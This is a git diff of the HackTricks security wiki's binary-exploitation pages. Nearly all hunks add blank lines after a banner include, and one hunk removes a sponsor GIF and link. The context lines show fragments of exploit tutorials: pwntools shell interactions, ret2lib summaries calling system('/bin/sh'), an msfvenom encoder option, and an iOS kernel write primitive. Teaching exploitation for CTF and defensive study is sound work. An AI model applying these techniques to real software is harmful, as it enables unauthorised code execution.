 - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@ -182,3 +182,5 @@ target.interactive()
 Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
@ -195,3 +195,5 @@ target.interactive()
  - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md
@ -187,3 +187,5 @@ p.interactive()
 - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md
@ -163,3 +163,5 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
  - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md
@ -35,3 +35,5 @@ angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so
 ```

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/ret2lib-+-printf-leak-arm64.md
@ -215,3 +215,5 @@ p.interactive()
 ```

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md
@ -302,3 +302,5 @@ BINSH = next(libc.search("/bin/sh")) - 64
 ```

 {{#include ../../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
@ -2,9 +2,6 @@

 {{#include ../../../../banners/hacktricks-training.md}}

-<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
-
-{% embed url="https://websec.nl/" %}

 ```python:template.py
 from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64  # Import pwntools
@ -222,8 +219,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
 BINSH = next(libc.search("/bin/sh")) - 64
 ```

-<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
-
-{% embed url="https://websec.nl/" %}

 {{#include ../../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md
@ -67,3 +67,5 @@ srop-sigreturn-oriented-programming/srop-arm64.md
 {{#endref}}

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md
@ -193,3 +193,5 @@ target.interactive()
  - 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md
@ -126,3 +126,5 @@ p.interactive()
 ```

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
@ -143,3 +143,5 @@ target.interactive()
  - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
@ -190,3 +190,5 @@ And to bypass the address of `/bin/sh` you could create several env variables po
 {{#endref}}

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/README.md
+++ b/src/binary-exploitation/stack-overflow/README.md
@ -102,3 +102,5 @@ There are several protections trying to prevent the exploitation of vulnerabilit
 {{#endref}}

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/pointer-redirecting.md
+++ b/src/binary-exploitation/stack-overflow/pointer-redirecting.md
@ -27,3 +27,5 @@ You can find an example in:
 - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/ret2win/README.md
+++ b/src/binary-exploitation/stack-overflow/ret2win/README.md
@ -113,3 +113,5 @@ ret2win-arm64.md
 {{#endref}}

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
+++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
@ -187,3 +187,5 @@ p.close()
 ```

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
+++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
@ -234,3 +234,5 @@ Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
 {{#endref}}

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md
+++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md
@ -95,3 +95,5 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
  - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
+++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
@ -79,3 +79,5 @@ The only "complicated" thing to find here would be the address in the stack to c
 I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.

 {{#include ../../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/stack-overflow/uninitialized-variables.md
+++ b/src/binary-exploitation/stack-overflow/uninitialized-variables.md
@ -66,3 +66,5 @@ int main() {
 This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai
 ```

 {{#include ../banners/hacktricks-training.md}}
+
+
--- a/src/blockchain/blockchain-and-crypto-currencies/README.md
+++ b/src/blockchain/blockchain-and-crypto-currencies/README.md
@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit
 - [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse)

 {{#include ../../banners/hacktricks-training.md}}
+
+
--- a/Show More
+++ b/Show More
				`@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {`

				`With these primitives, the exploit provides controlled 32-bit reads and 64-bit writes to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).`